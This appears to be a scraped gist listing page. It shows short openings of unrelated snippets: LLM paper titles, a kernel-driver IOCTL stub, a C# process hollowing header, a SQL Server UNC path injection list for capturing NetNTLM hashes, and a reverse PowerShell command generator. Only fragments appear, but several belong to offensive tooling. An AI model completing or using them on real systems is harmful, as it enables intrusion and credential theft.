This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Cedille: A large autoregressive French language model | |
The Wisdom of Hindsight Makes Language Models Better Instruction Followers | |
ChatGPT: A Study on its Utility for Ubiquitous Software Engineering Tasks | |
Query2doc: Query Expansion with Large Language Models | |
The Internal State of an LLM Knows When its Lying | |
Structured information extraction from complex scientific text with fine-tuned large language models | |
TrueTeacher: Learning Factual Consistency Evaluation with Large Language Models | |
Large Language Models Encode Clinical Knowledge | |
PoET: A generative model of protein families as sequences-of-sequences | |
Fine-Grained Human Feedback Gives Better Rewards for Language Model Training |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <iostream> | |
#include <dbghelp.h> | |
#include <TlHelp32.h> | |
#define IOCTL_BASE 0x80012008 | |
constexpr DWORD IREC_IOCTL(DWORD x) { return IOCTL_BASE + x; } | |
#define IOTCL_IREC_OPEN_PROCESS IREC_IOCTL( 0x20 ) | |
static const char* DeviceName = R"(\\.\IREC)"; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/*************** | |
* Simple Process Hollowing in C# | |
* | |
* #Build Your Binaries | |
* c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe | |
* | |
* @author: Michael Gorelik <smgorelik@gmail.com> | |
* gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75 | |
* #Most of the code taken from here: @github: github.com/ambray |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This is a list of SQL Server commands that support UNC path [injections] by default. | |
The injections can be used to capture or replay the NetNTLM password hash of the | |
Windows account used to run the SQL Server service. The SQL Server service account | |
has sysadmin privileges by default in all versions of SQL Server. | |
Note: This list is most likely not complete. | |
----------------------------------------------------------------------- | |
-- UNC Path Injections Executable by the Public Fixed Server Role | |
----------------------------------------------------------------------- |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# | |
# generate reverse powershell cmdline with base64 encoded args | |
# | |
import sys | |
import base64 | |
def help(): | |
print("USAGE: %s IP PORT" % sys.argv[0]) |